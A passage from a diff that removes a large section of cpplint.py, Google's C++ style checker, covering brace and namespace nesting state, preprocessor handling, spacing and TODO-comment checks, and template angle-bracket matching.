preprocessor macros can be cpplint clean. - # - # We also accept stuff like "// end of namespace ." with the - # period at the end. - # - # Besides these, we don't accept anything else, otherwise we might - # get false negatives when existing comment is a substring of the - # expected namespace. 
- if self.name: - # Named namespace - if not Match((r'};*\s*(//|/\*).*\bnamespace\s+' + re.escape(self.name) + - r'[\*/\.\\\s]*$'), - line): - error(filename, linenum, 'readability/namespace', 5, - 'Namespace should be terminated with "// namespace %s"' % - self.name) - else: - # Anonymous namespace - if not Match(r'};*\s*(//|/\*).*\bnamespace[\*/\.\\\s]*$', line): - error(filename, linenum, 'readability/namespace', 5, - 'Namespace should be terminated with "// namespace"') - - -class _PreprocessorInfo(object): - """Stores checkpoints of nesting stacks when #if/#else is seen.""" - - def __init__(self, stack_before_if): - # The entire nesting stack before #if - self.stack_before_if = stack_before_if - - # The entire nesting stack up to #else - self.stack_before_else = [] - - # Whether we have already seen #else or #elif - self.seen_else = False - - -class _NestingState(object): - """Holds states related to parsing braces.""" - - def __init__(self): - # Stack for tracking all braces. An object is pushed whenever we - # see a "{", and popped when we see a "}". Only 3 types of - # objects are possible: - # - _ClassInfo: a class or struct. - # - _NamespaceInfo: a namespace. - # - _BlockInfo: some other type of block. - self.stack = [] - - # Stack of _PreprocessorInfo objects. - self.pp_stack = [] - - def SeenOpenBrace(self): - """Check if we have seen the opening brace for the innermost block. - - Returns: - True if we have seen the opening brace, False if the innermost - block is still expecting an opening brace. - """ - return (not self.stack) or self.stack[-1].seen_open_brace - - def InNamespaceBody(self): - """Check if we are currently one level inside a namespace body. - - Returns: - True if top of the stack is a namespace block, False otherwise. - """ - return self.stack and isinstance(self.stack[-1], _NamespaceInfo) - - def UpdatePreprocessor(self, line): - """Update preprocessor stack. - - We need to handle preprocessors due to classes like this: - #ifdef SWIG - struct ResultDetailsPageElementExtensionPoint { - #else - struct ResultDetailsPageElementExtensionPoint : public Extension { - #endif - - We make the following assumptions (good enough for most files): - - Preprocessor condition evaluates to true from #if up to first - #else/#elif/#endif. - - - Preprocessor condition evaluates to false from #else/#elif up - to #endif. We still perform lint checks on these lines, but - these do not affect nesting stack. - - Args: - line: current line to check. - """ - if Match(r'^\s*#\s*(if|ifdef|ifndef)\b', line): - # Beginning of #if block, save the nesting stack here. The saved - # stack will allow us to restore the parsing state in the #else case. - self.pp_stack.append(_PreprocessorInfo(copy.deepcopy(self.stack))) - elif Match(r'^\s*#\s*(else|elif)\b', line): - # Beginning of #else block - if self.pp_stack: - if not self.pp_stack[-1].seen_else: - # This is the first #else or #elif block. Remember the - # whole nesting stack up to this point. This is what we - # keep after the #endif. - self.pp_stack[-1].seen_else = True - self.pp_stack[-1].stack_before_else = copy.deepcopy(self.stack) - - # Restore the stack to how it was before the #if - self.stack = copy.deepcopy(self.pp_stack[-1].stack_before_if) - else: - # TODO(unknown): unexpected #else, issue warning? - pass - elif Match(r'^\s*#\s*endif\b', line): - # End of #if or #else blocks. 
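# The #if/#else checkpointing above, reduced to its core (illustrative
# helper, not cpplint's API): snapshot the brace stack at #if, remember the
# pre-#else state once per block, and let #endif decide which snapshot wins.
import copy
import re

def preprocess(line, stack, pp_stack):
    if re.match(r'^\s*#\s*(if|ifdef|ifndef)\b', line):
        pp_stack.append({'before_if': copy.deepcopy(stack),
                         'before_else': None, 'seen_else': False})
    elif re.match(r'^\s*#\s*(else|elif)\b', line) and pp_stack:
        if not pp_stack[-1]['seen_else']:
            pp_stack[-1]['seen_else'] = True
            pp_stack[-1]['before_else'] = copy.deepcopy(stack)
        stack[:] = copy.deepcopy(pp_stack[-1]['before_if'])
    elif re.match(r'^\s*#\s*endif\b', line) and pp_stack:
        frame = pp_stack.pop()
        if frame['seen_else']:
            stack[:] = frame['before_else']

stack, pp = [], []
for src in ('#ifdef SWIG', '#else', '#endif'):
    preprocess(src, stack, pp)
print(pp)  # []: the block was closed and its checkpoint dropped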
- if self.pp_stack: - # If we saw an #else, we will need to restore the nesting - # stack to its former state before the #else, otherwise we - # will just continue from where we left off. - if self.pp_stack[-1].seen_else: - # Here we can just use a shallow copy since we are the last - # reference to it. - self.stack = self.pp_stack[-1].stack_before_else - # Drop the corresponding #if - self.pp_stack.pop() - else: - # TODO(unknown): unexpected #endif, issue warning? - pass - - def Update(self, filename, clean_lines, linenum, error): - """Update nesting state with current line. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - - # Update pp_stack first - self.UpdatePreprocessor(line) - - # Count parentheses. This is to avoid adding struct arguments to - # the nesting stack. - if self.stack: - inner_block = self.stack[-1] - depth_change = line.count('(') - line.count(')') - inner_block.open_parentheses += depth_change - - # Also check if we are starting or ending an inline assembly block. - if inner_block.inline_asm in (_NO_ASM, _END_ASM): - if (depth_change != 0 and - inner_block.open_parentheses == 1 and - _MATCH_ASM.match(line)): - # Enter assembly block - inner_block.inline_asm = _INSIDE_ASM - else: - # Not entering assembly block. If previous line was _END_ASM, - # we will now shift to _NO_ASM state. - inner_block.inline_asm = _NO_ASM - elif (inner_block.inline_asm == _INSIDE_ASM and - inner_block.open_parentheses == 0): - # Exit assembly block - inner_block.inline_asm = _END_ASM - - # Consume namespace declaration at the beginning of the line. Do - # this in a loop so that we catch same line declarations like this: - # namespace proto2 { namespace bridge { class MessageSet; } } - while True: - # Match start of namespace. The "\b\s*" below catches namespace - # declarations even if it weren't followed by a whitespace, this - # is so that we don't confuse our namespace checker. The - # missing spaces will be flagged by CheckSpacing. - namespace_decl_match = Match(r'^\s*namespace\b\s*([:\w]+)?(.*)$', line) - if not namespace_decl_match: - break - - new_namespace = _NamespaceInfo(namespace_decl_match.group(1), linenum) - self.stack.append(new_namespace) - - line = namespace_decl_match.group(2) - if line.find('{') != -1: - new_namespace.seen_open_brace = True - line = line[line.find('{') + 1:] - - # Look for a class declaration in whatever is left of the line - # after parsing namespaces. The regexp accounts for decorated classes - # such as in: - # class LOCKABLE API Object { - # }; - # - # Templates with class arguments may confuse the parser, for example: - # template <typename Comparator = less<int>, - # class Vector = vector<int> > - # class HeapQueue { - # - # Because this parser has no nesting state about templates, by the - # time it saw "class Comparator", it may think that it's a new class. - # Nested templates have a similar problem: - # template < - # typename ExportedType, - # typename TupleType, - # template <typename, typename> class ImplTemplate> - # - # To avoid these cases, we ignore classes that are followed by '=' or '>' - class_decl_match = Match( - r'\s*(template\s*<[\w\s<>,:]*>\s*)?'
- r'(class|struct)\s+([A-Z_]+\s+)*(\w+(?:::\w+)*)' - r'(([^=>]|<[^<>]*>|<[^<>]*<[^<>]*>\s*>)*)$', line) - if (class_decl_match and - (not self.stack or self.stack[-1].open_parentheses == 0)): - self.stack.append(_ClassInfo( - class_decl_match.group(4), class_decl_match.group(2), - clean_lines, linenum)) - line = class_decl_match.group(5) - - # If we have not yet seen the opening brace for the innermost block, - # run checks here. - if not self.SeenOpenBrace(): - self.stack[-1].CheckBegin(filename, clean_lines, linenum, error) - - # Update access control if we are inside a class/struct - if self.stack and isinstance(self.stack[-1], _ClassInfo): - classinfo = self.stack[-1] - access_match = Match( - r'^(.*)\b(public|private|protected|signals)(\s+(?:slots\s*)?)?' - r':(?:[^:]|$)', - line) - if access_match: - classinfo.access = access_match.group(2) - - # Check that access keywords are indented +1 space. Skip this - # check if the keywords are not preceded by whitespaces. - indent = access_match.group(1) - if (len(indent) != classinfo.class_indent + 1 and - Match(r'^\s*$', indent)): - if classinfo.is_struct: - parent = 'struct ' + classinfo.name - else: - parent = 'class ' + classinfo.name - slots = '' - if access_match.group(3): - slots = access_match.group(3) - error(filename, linenum, 'whitespace/indent', 3, - '%s%s: should be indented +1 space inside %s' % ( - access_match.group(2), slots, parent)) - - # Consume braces or semicolons from what's left of the line - while True: - # Match first brace, semicolon, or closed parenthesis. - matched = Match(r'^[^{;)}]*([{;)}])(.*)$', line) - if not matched: - break - - token = matched.group(1) - if token == '{': - # If namespace or class hasn't seen a opening brace yet, mark - # namespace/class head as complete. Push a new block onto the - # stack otherwise. - if not self.SeenOpenBrace(): - self.stack[-1].seen_open_brace = True - else: - self.stack.append(_BlockInfo(True)) - if _MATCH_ASM.match(line): - self.stack[-1].inline_asm = _BLOCK_ASM - elif token == ';' or token == ')': - # If we haven't seen an opening brace yet, but we already saw - # a semicolon, this is probably a forward declaration. Pop - # the stack for these. - # - # Similarly, if we haven't seen an opening brace yet, but we - # already saw a closing parenthesis, then these are probably - # function arguments with extra "class" or "struct" keywords. - # Also pop these stack for these. - if not self.SeenOpenBrace(): - self.stack.pop() - else: # token == '}' - # Perform end of block checks and pop the stack. - if self.stack: - self.stack[-1].CheckEnd(filename, clean_lines, linenum, error) - self.stack.pop() - line = matched.group(2) - - def InnermostClass(self): - """Get class info on the top of the stack. - - Returns: - A _ClassInfo object if we are inside a class, or None otherwise. - """ - for i in range(len(self.stack), 0, -1): - classinfo = self.stack[i - 1] - if isinstance(classinfo, _ClassInfo): - return classinfo - return None - - def CheckCompletedBlocks(self, filename, error): - """Checks that all classes and namespaces have been completely parsed. - - Call this when all lines in a file have been processed. - Args: - filename: The name of the current file. - error: The function to call with any errors found. - """ - # Note: This test can result in false positives if #ifdef constructs - # get in the way of brace matching. See the testBuildClass test in - # cpplint_unittest.py for an example of this. 
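# The namespace-consumption loop above, standalone: peel any number of
# same-line declarations off the front, so one physical line can push
# several namespace scopes.
import re

def open_namespaces(line):
    names = []
    while True:
        matched = re.match(r'^\s*namespace\b\s*([:\w]+)?(.*)$', line)
        if not matched:
            break
        names.append(matched.group(1) or '(anonymous)')
        line = matched.group(2)
        if '{' in line:
            line = line[line.find('{') + 1:]
    return names

print(open_namespaces('namespace proto2 { namespace bridge { class M; } }'))
# ['proto2', 'bridge']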
- for obj in self.stack: - if isinstance(obj, _ClassInfo): - error(filename, obj.starting_linenum, 'build/class', 5, - 'Failed to find complete declaration of class %s' % - obj.name) - elif isinstance(obj, _NamespaceInfo): - error(filename, obj.starting_linenum, 'build/namespaces', 5, - 'Failed to find complete declaration of namespace %s' % - obj.name) - - -def CheckForNonStandardConstructs(filename, clean_lines, linenum, - nesting_state, error): - r"""Logs an error if we see certain non-ANSI constructs ignored by gcc-2. - - Complain about several constructs which gcc-2 accepts, but which are - not standard C++. Warning about these in lint is one way to ease the - transition to new compilers. - - put storage class first (e.g. "static const" instead of "const static"). - - "%lld" instead of %qd" in printf-type functions. - - "%1$d" is non-standard in printf-type functions. - - "\%" is an undefined character escape sequence. - - text after #endif is not allowed. - - invalid inner-style forward declaration. - - >? and <? operators, and their >?= and <?= cousins. - - Additionally, check for constructor/destructor style violations and reference - members, as it is very convenient to do so while checking for - gcc-2 compliance. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: A callable to which errors are reported, which takes 4 arguments: - filename, line number, error level, and message - """ - - # Remove comments from the line, but leave in strings for now. - line = clean_lines.lines[linenum] - - if Search(r'printf\s*\(.*".*%[-+ ]?\d*q', line): - error(filename, linenum, 'runtime/printf_format', 3, - '%q in format strings is deprecated. Use %ll instead.') - - if Search(r'printf\s*\(.*".*%\d+\$', line): - error(filename, linenum, 'runtime/printf_format', 2, - '%N$ formats are unconventional. Try rewriting to avoid them.') - - # Remove escaped backslashes before looking for undefined escapes. - line = line.replace('\\\\', '') - - if Search(r'("|\').*\\(%|\[|\(|{)', line): - error(filename, linenum, 'build/printf_format', 3, - '%, [, (, and { are undefined character escapes. Unescape them.') - - # For the rest, work with both comments and strings removed. - line = clean_lines.elided[linenum] - - if Search(r'\b(const|volatile|void|char|short|int|long' - r'|float|double|signed|unsigned' - r'|schar|u?int8|u?int16|u?int32|u?int64)' - r'\s+(register|static|extern|typedef)\b', - line): - error(filename, linenum, 'build/storage_class', 5, - 'Storage class (static, extern, typedef, etc) should be first.') - - if Match(r'\s*#\s*endif\s*[^/\s]+', line): - error(filename, linenum, 'build/endif_comment', 5, - 'Uncommented text after #endif is non-standard. Use a comment.') - - if Match(r'\s*class\s+(\w+\s*::\s*)+\w+\s*;', line): - error(filename, linenum, 'build/forward_decl', 5, - 'Inner-style forward declarations are invalid. Remove this line.') - - if Search(r'(\w+|[+-]?\d+(\.\d*)?)\s*(<|>)\?=?\s*(\w+|[+-]?\d+)(\.\d*)?', - line): - error(filename, linenum, 'build/deprecated', 3, - '>? and <? (max and min) operators are non-standard and deprecated.') - - if Search(r'^\s*const\s*string\s*&\s*\w+\s*;', line): - # TODO(unknown): Could it be expanded safely to arbitrary references, - # without triggering too many false positives? The first - # attempt triggered 5 warnings for mostly benign code in the regtest, hence - # the restriction. - # Here's the original regexp, for the reference: - # type_name = r'\w+((\s*::\s*\w+)|(\s*<\s*\w+?\s*>))?' - # r'\s*const\s*' + type_name + '\s*&\s*\w+\s*;' - error(filename, linenum, 'runtime/member_string_references', 2, - 'const string& members are dangerous. It is much better to use ' - 'alternatives, such as pointers or simple constants.') - - # Everything else in this function operates on class declarations. - # Return early if the top of the nesting stack is not a class, or if - # the class head is not completed yet. - classinfo = nesting_state.InnermostClass() - if not classinfo or not classinfo.seen_open_brace: - return - - # The class may have been declared with namespace or classname qualifiers. - # The constructor and destructor will not have those qualifiers. - base_classname = classinfo.name.split('::')[-1] - - # Look for single-argument constructors that aren't marked explicit. - # Technically a valid construct, but against style. - args = Match(r'\s+(?:inline\s+)?%s\s*\(([^,()]+)\)' - % re.escape(base_classname), - line) - if (args and - args.group(1) != 'void' and - not Match(r'(const\s+)?%s(\s+const)?\s*(?:<\w+>\s*)?&' - % re.escape(base_classname), args.group(1).strip())): - error(filename, linenum, 'runtime/explicit', 5, - 'Single-argument constructors should be marked explicit.') - - -def CheckSpacingForFunctionCall(filename, line, linenum, error): - """Checks for the correctness of various spacing around function calls. - - Args: - filename: The name of the current file. - line: The text of the line to check. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - - # Since function calls often occur inside if/for/while/switch - # expressions - which have their own, more liberal conventions - we - # first see if we should be looking inside such an expression for a - # function call, to which we can apply more strict standards. - fncall = line # if there's no control flow construct, look at whole line - for pattern in (r'\bif\s*\((.*)\)\s*{', - r'\bfor\s*\((.*)\)\s*{', - r'\bwhile\s*\((.*)\)\s*[{;]', - r'\bswitch\s*\((.*)\)\s*{'): - match = Search(pattern, line) - if match: - fncall = match.group(1) # look inside the parens for function calls - break - - # Except in if/for/while/switch, there should never be space - # immediately inside parens (eg "f( 3, 4 )"). We make an exception - # for nested parens ( (a+b) + c ). Likewise, there should never be - # a space before a ( when it's a function argument.
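# The explicit-constructor heuristic above on two candidates, with a
# hypothetical class name; the copy constructor's reference parameter is
# the one argument shape that escapes the warning.
import re

def needs_explicit(classname, line):
    args = re.search(r'\s+(?:inline\s+)?%s\s*\(([^,()]+)\)'
                     % re.escape(classname), line)
    return bool(args and args.group(1) != 'void' and
                not re.match(r'(const\s+)?%s(\s+const)?\s*(?:<\w+>\s*)?&'
                             % re.escape(classname), args.group(1).strip()))

print(needs_explicit('Foo', '  Foo(int x);'))             # True: flag it
print(needs_explicit('Foo', '  Foo(const Foo& other);'))  # False: copy ctor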
I assume it's a - # function argument when the char before the whitespace is legal in - # a function name (alnum + _) and we're not starting a macro. Also ignore - # pointers and references to arrays and functions coz they're too tricky: - # we use a very simple way to recognize these: - # " (something)(maybe-something)" or - # " (something)(maybe-something," or - # " (something)[something]" - # Note that we assume the contents of [] to be short enough that - # they'll never need to wrap. - if ( # Ignore control structures. - not Search(r'\b(if|for|while|switch|return|new|delete|catch|sizeof)\b', - fncall) and - # Ignore pointers/references to functions. - not Search(r' \([^)]+\)\([^)]*(\)|,$)', fncall) and - # Ignore pointers/references to arrays. - not Search(r' \([^)]+\)\[[^\]]+\]', fncall)): - if Search(r'\w\s*\(\s(?!\s*\\$)', fncall): # a ( used for a fn call - error(filename, linenum, 'whitespace/parens', 4, - 'Extra space after ( in function call') - elif Search(r'\(\s+(?!(\s*\\)|\()', fncall): - error(filename, linenum, 'whitespace/parens', 2, - 'Extra space after (') - if (Search(r'\w\s+\(', fncall) and - not Search(r'#\s*define|typedef', fncall) and - not Search(r'\w\s+\((\w+::)*\*\w+\)\(', fncall)): - error(filename, linenum, 'whitespace/parens', 4, - 'Extra space before ( in function call') - # If the ) is followed only by a newline or a { + newline, assume it's - # part of a control statement (if/while/etc), and don't complain - if Search(r'[^)]\s+\)\s*[^{\s]', fncall): - # If the closing parenthesis is preceded by only whitespaces, - # try to give a more descriptive error message. - if Search(r'^\s+\)', fncall): - error(filename, linenum, 'whitespace/parens', 2, - 'Closing ) should be moved to the previous line') - else: - error(filename, linenum, 'whitespace/parens', 2, - 'Extra space before )') - - -def IsBlankLine(line): - """Returns true if the given line is blank. - - We consider a line to be blank if the line is empty or consists of - only white spaces. - - Args: - line: A line of a string. - - Returns: - True, if the given line is blank. - """ - return not line or line.isspace() - - -def CheckForFunctionLengths(filename, clean_lines, linenum, - function_state, error): - """Reports for long function bodies. - - For an overview why this is done, see: - http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml#Write_Short_Functions - - Uses a simplistic algorithm assuming other style guidelines - (especially spacing) are followed. - Only checks unindented functions, so class members are unchecked. - Trivial bodies are unchecked, so constructors with huge initializer lists - may be missed. - Blank/comment lines are not counted so as to avoid encouraging the removal - of vertical space and comments just to get through a lint check. - NOLINT *on the last line of a function* disables this check. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - function_state: Current function name and lines in body so far. - error: The function to call with any errors found. - """ - lines = clean_lines.lines - line = lines[linenum] - raw = clean_lines.raw_lines - raw_line = raw[linenum] - joined_line = '' - - starting_func = False - regexp = r'(\w(\w|::|\*|\&|\s)*)\(' # decls * & space::name( ... - match_result = Match(regexp, line) - if match_result: - # If the name is all caps and underscores, figure it's a macro and - # ignore it, unless it's TEST or TEST_F. 
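# Two of the spacing patterns above on concrete calls: a space right after
# '(' in what looks like a call, and a space between a function name and
# its opening parenthesis.
import re

print(bool(re.search(r'\w\s*\(\s(?!\s*\\$)', 'f( 3, 4)')))  # True: space after (
print(bool(re.search(r'\w\s*\(\s(?!\s*\\$)', 'f(3, 4)')))   # False: clean call
print(bool(re.search(r'\w\s+\(', 'memset (buf, 0, n)')))    # True: space before (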
- function_name = match_result.group(1).split()[-1] - if function_name == 'TEST' or function_name == 'TEST_F' or ( - not Match(r'[A-Z_]+$', function_name)): - starting_func = True - - if starting_func: - body_found = False - for start_linenum in xrange(linenum, clean_lines.NumLines()): - start_line = lines[start_linenum] - joined_line += ' ' + start_line.lstrip() - if Search(r'(;|})', start_line): # Declarations and trivial functions - body_found = True - break # ... ignore - elif Search(r'{', start_line): - body_found = True - function = Search(r'((\w|:)*)\(', line).group(1) - if Match(r'TEST', function): # Handle TEST... macros - parameter_regexp = Search(r'(\(.*\))', joined_line) - if parameter_regexp: # Ignore bad syntax - function += parameter_regexp.group(1) - else: - function += '()' - function_state.Begin(function) - break - if not body_found: - # No body for the function (or evidence of a non-function) was found. - error(filename, linenum, 'readability/fn_size', 5, - 'Lint failed to find start of function body.') - elif Match(r'^\}\s*$', line): # function end - function_state.Check(error, filename, linenum) - function_state.End() - elif not Match(r'^\s*$', line): - function_state.Count() # Count non-blank/non-comment lines. - - -_RE_PATTERN_TODO = re.compile(r'^//(\s*)TODO(\(.+?\))?:?(\s|$)?') - - -def CheckComment(comment, filename, linenum, error): - """Checks for common mistakes in TODO comments. - - Args: - comment: The text of the comment from the line in question. - filename: The name of the current file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - match = _RE_PATTERN_TODO.match(comment) - if match: - # One whitespace is correct; zero whitespace is handled elsewhere. - leading_whitespace = match.group(1) - if len(leading_whitespace) > 1: - error(filename, linenum, 'whitespace/todo', 2, - 'Too many spaces before TODO') - - username = match.group(2) - if not username: - error(filename, linenum, 'readability/todo', 2, - 'Missing username in TODO; it should look like ' - '"// TODO(my_username): Stuff."') - - middle_whitespace = match.group(3) - # Comparisons made explicit for correctness -- pylint: disable=g-explicit-bool-comparison - if middle_whitespace != ' ' and middle_whitespace != '': - error(filename, linenum, 'whitespace/todo', 2, - 'TODO(my_username) should be followed by a space') - -def CheckAccess(filename, clean_lines, linenum, nesting_state, error): - """Checks for improper use of DISALLOW* macros. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] # get rid of comments and strings - - matched = Match((r'\s*(DISALLOW_COPY_AND_ASSIGN|' - r'DISALLOW_EVIL_CONSTRUCTORS|' - r'DISALLOW_IMPLICIT_CONSTRUCTORS)'), line) - if not matched: - return - if nesting_state.stack and isinstance(nesting_state.stack[-1], _ClassInfo): - if nesting_state.stack[-1].access != 'private': - error(filename, linenum, 'readability/constructors', 3, - '%s must be in the private: section' % matched.group(1)) - - else: - # Found DISALLOW* macro outside a class declaration, or perhaps it - # was used inside a function when it should have been part of the - # class declaration. 
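# _RE_PATTERN_TODO above, exercised: group 2 carries the owner, so a TODO
# without "(username)" is reported as missing its owner.
import re

_TODO = re.compile(r'^//(\s*)TODO(\(.+?\))?:?(\s|$)?')

print(_TODO.match('// TODO: fix this').group(2))         # None: no username
print(_TODO.match('// TODO(user1): fix this').group(2))  # (user1)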
We could issue a warning here, but it - # probably resulted in a compiler error already. - pass - - - def FindNextMatchingAngleBracket(clean_lines, linenum, init_suffix): - """Find the corresponding > to close a template. - - Args: - clean_lines: A CleansedLines instance containing the file. - linenum: Current line number. - init_suffix: Remainder of the current line after the initial <. - - Returns: - True if a matching bracket exists. - """ - line = init_suffix - nesting_stack = ['<'] - while True: - # Find the next operator that can tell us whether < is used as an - # opening bracket or as a less-than operator. We only want to - # warn on the latter case. - # - # We could also check all other operators and terminate the search - # early, but we keep it simple here and scan one operator at a time. - match = Search(r'^[^<>(),;\[\]]*([<>(),;\[\]])(.*)$', line) - if match: - # Found an operator, update nesting stack - operator = match.group(1) - line = match.group(2) - - if nesting_stack[-1] == '<': - # Expecting closing angle bracket - if operator in ('<', '(', '['): - nesting_stack.append(operator) - elif operator == '>': - nesting_stack.pop() - if not nesting_stack: - # Found matching angle bracket - return True - elif operator == ',': - # Got a comma after a bracket, this is most likely a template - # argument. We have not seen a closing angle bracket yet, but - # it's probably a few lines later if we look for it, so just - # return early here. - return True - else: - # Got some other operator. - return False - - else: - # Expecting closing parenthesis or closing bracket - if operator in ('<', '(', '['): - nesting_stack.append(operator) - elif operator in (')', ']'): - # We don't bother checking for matching () or []. If we got - # something like (] or [), it would have been a syntax error. - nesting_stack.pop() - - else: - # Scan the next line - linenum += 1 - if linenum >= len(clean_lines.elided): - break - line = clean_lines.elided[linenum] - - # Exhausted all remaining lines and still no matching angle bracket. - # Most likely the input was incomplete, otherwise we should have - # seen a semicolon and returned early. - return True - - - def FindPreviousMatchingAngleBracket(clean_lines, linenum, init_prefix): - """Find the corresponding < that started a template. - - Args: - clean_lines: A CleansedLines instance containing the file. - linenum: Current line number. - init_prefix: Part of the current line before the initial >. - - Returns: - True if a matching bracket exists. - """ - line = init_prefix - nesting_stack = ['>'] - while True: - # Find the previous operator - match = Search(r'^(.*)([<>(),;\[\]])[^<>(),;\[\]]*$', line) - if match: - # Found an operator, update nesting stack - operator = match.group(2) - line = match.group(1) - - if nesting_stack[-1] == '>': - # Expecting opening angle bracket - if operator in ('>', ')', ']'): - nesting_stack.append(operator) - elif operator == '<': - nesting_stack.pop() - if not nesting_stack: - # Found matching angle bracket - return True - elif operator == ',': - # Got a comma before a bracket, this is most likely a - # template argument. The opening angle bracket is probably - # there if we look for it, so just return early here. - return True - else: - # Got some other operator.
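A condensed, single-line rendition of that forward scan (a hypothetical helper, for illustration only; the real function also keeps consuming subsequent elided lines):

import re

def _forward_scan(suffix):  # hypothetical one-line variant of the scan above
    stack = ['<']
    while suffix:
        m = re.search(r'^[^<>(),;\[\]]*([<>(),;\[\]])(.*)$', suffix)
        if not m:
            break
        op, suffix = m.group(1), m.group(2)
        if op in ('<', '(', '['):
            stack.append(op)
        elif op == '>' and stack[-1] == '<':
            stack.pop()
            if not stack:
                return True          # found the matching angle bracket
        elif op in (')', ']') and stack[-1] != '<':
            stack.pop()
        elif op == ',' and stack[-1] == '<':
            return True              # comma inside <>: treat as template argument
        elif stack[-1] == '<':
            return False             # some other operator: likely a less-than
    return True                      # ran out of input without contrary evidence

assert _forward_scan('int> v;')      # "vector<int> v;" after the "<" -> template
assert not _forward_scan('b); }')    # "if (a<b); }" after the "<" -> less-than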
- return False - - else: - # Expecting opening parenthesis or opening bracket - if operator in ('>', ')', ']'): - nesting_stack.append(operator) - elif operator in ('(', '['): - nesting_stack.pop() - - else: - # Scan the previous line - linenum -= 1 - if linenum < 0: - break - line = clean_lines.elided[linenum] - - # Exhausted all earlier lines and still no matching angle bracket. - return False - - -def CheckSpacing(filename, clean_lines, linenum, nesting_state, error): - """Checks for the correctness of various spacing issues in the code. - - Things we check for: spaces around operators, spaces after - if/for/while/switch, no spaces around parens in function calls, two - spaces between code and comment, don't start a block with a blank - line, don't end a function with a blank line, don't add a blank line - after public/protected/private, don't have too many blank lines in a row. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: The function to call with any errors found. - """ - - # Don't use "elided" lines here, otherwise we can't check commented lines. - # Don't want to use "raw" either, because we don't want to check inside C++11 - # raw strings, - raw = clean_lines.lines_without_raw_strings - line = raw[linenum] - - # Before nixing comments, check if the line is blank for no good - # reason. This includes the first line after a block is opened, and - # blank lines at the end of a function (ie, right before a line like '}' - # - # Skip all the blank line checks if we are immediately inside a - # namespace body. In other words, don't issue blank line warnings - # for this block: - # namespace { - # - # } - # - # A warning about missing end of namespace comments will be issued instead. - if IsBlankLine(line) and not nesting_state.InNamespaceBody(): - elided = clean_lines.elided - prev_line = elided[linenum - 1] - prevbrace = prev_line.rfind('{') - # TODO(unknown): Don't complain if line before blank line, and line after, - # both start with alnums and are indented the same amount. - # This ignores whitespace at the start of a namespace block - # because those are not usually indented. - if prevbrace != -1 and prev_line[prevbrace:].find('}') == -1: - # OK, we have a blank line at the start of a code block. Before we - # complain, we check if it is an exception to the rule: The previous - # non-empty line has the parameters of a function header that are indented - # 4 spaces (because they did not fit in a 80 column line when placed on - # the same line as the function name). We also check for the case where - # the previous line is indented 6 spaces, which may happen when the - # initializers of a constructor do not fit into a 80 column line. - exception = False - if Match(r' {6}\w', prev_line): # Initializer list? - # We are looking for the opening column of initializer list, which - # should be indented 4 spaces to cause 6 space indentation afterwards. - search_position = linenum-2 - while (search_position >= 0 - and Match(r' {6}\w', elided[search_position])): - search_position -= 1 - exception = (search_position >= 0 - and elided[search_position][:5] == ' :') - else: - # Search for the function arguments or an initializer list. 
We use a - # simple heuristic here: If the line is indented 4 spaces; and we have a - # closing paren, without the opening paren, followed by an opening brace - # or colon (for initializer lists) we assume that it is the last line of - # a function header. If we have a colon indented 4 spaces, it is an - # initializer list. - exception = (Match(r' {4}\w[^\(]*\)\s*(const\s*)?(\{\s*$|:)', - prev_line) - or Match(r' {4}:', prev_line)) - - if not exception: - error(filename, linenum, 'whitespace/blank_line', 2, - 'Redundant blank line at the start of a code block ' - 'should be deleted.') - # Ignore blank lines at the end of a block in a long if-else - # chain, like this: - # if (condition1) { - # // Something followed by a blank line - # - # } else if (condition2) { - # // Something else - # } - if linenum + 1 < clean_lines.NumLines(): - next_line = raw[linenum + 1] - if (next_line - and Match(r'\s*}', next_line) - and next_line.find('} else ') == -1): - error(filename, linenum, 'whitespace/blank_line', 3, - 'Redundant blank line at the end of a code block ' - 'should be deleted.') - - matched = Match(r'\s*(public|protected|private):', prev_line) - if matched: - error(filename, linenum, 'whitespace/blank_line', 3, - 'Do not leave a blank line after "%s:"' % matched.group(1)) - - # Next, we complain if there's a comment too near the text - commentpos = line.find('//') - if commentpos != -1: - # Check if the // may be in quotes. If so, ignore it - # Comparisons made explicit for clarity -- pylint: disable=g-explicit-bool-comparison - if (line.count('"', 0, commentpos) - - line.count('\\"', 0, commentpos)) % 2 == 0: # not in quotes - # Allow one space for new scopes, two spaces otherwise: - if (not Match(r'^\s*{ //', line) and - ((commentpos >= 1 and - line[commentpos-1] not in string.whitespace) or - (commentpos >= 2 and - line[commentpos-2] not in string.whitespace))): - error(filename, linenum, 'whitespace/comments', 2, - 'At least two spaces is best between code and comments') - # There should always be a space between the // and the comment - commentend = commentpos + 2 - if commentend < len(line) and not line[commentend] == ' ': - # but some lines are exceptions -- e.g. if they're big - # comment delimiters like: - # //---------------------------------------------------------- - # or are an empty C++ style Doxygen comment, like: - # /// - # or C++ style Doxygen comments placed after the variable: - # ///< Header comment - # //!< Header comment - # or they begin with multiple slashes followed by a space: - # //////// Header comment - match = (Search(r'[=/-]{4,}\s*$', line[commentend:]) or - Search(r'^/$', line[commentend:]) or - Search(r'^!< ', line[commentend:]) or - Search(r'^/< ', line[commentend:]) or - Search(r'^/+ ', line[commentend:])) - if not match: - error(filename, linenum, 'whitespace/comments', 4, - 'Should have a space between // and comment') - CheckComment(line[commentpos:], filename, linenum, error) - - line = clean_lines.elided[linenum] # get rid of comments and strings - - # Don't try to do spacing checks for operator methods - line = re.sub(r'operator(==|!=|<|<<|<=|>=|>>|>)\(', 'operator\(', line) - - # We allow no-spaces around = within an if: "if ( (a=Foo()) == 0 )". - # Otherwise not. Note we only check for non-spaces on *both* sides; - # sometimes people put non-spaces on one side when aligning ='s among - # many lines (not that this is behavior that I approve of...) 
